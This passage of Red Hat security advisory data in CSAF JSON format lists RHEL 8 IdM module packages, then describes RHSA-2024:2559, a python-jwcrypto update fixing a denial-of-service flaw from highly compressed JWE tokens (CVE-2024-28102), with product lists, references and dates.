"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
rhsa-2024_2559
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-jwcrypto is now available for Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.\n\nSecurity Fix(es):\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2559",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2559.json"
}
],
"title": "Red Hat Security Advisory: python-jwcrypto security update",
"tracking": {
"current_release_date": "2024-11-24T15:20:40+00:00",
"generator": {
"date": "2024-11-24T15:20:40+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:2559",
"initial_release_date": "2024-04-30T13:36:16+00:00",
"revision_history": [
{
"date": "2024-04-30T13:36:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:36:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T15:20:40+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_id": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.8-5.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_id": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.8-5.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src"
},
"product_reference": "python-jwcrypto-0:0.8-5.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
},
"product_reference": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28102"
},
{
"category": "external",
"summary": "RHBZ#2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"category": "external",
"summary": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
}
],
"release_date": "2024-03-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:36:16+00:00",
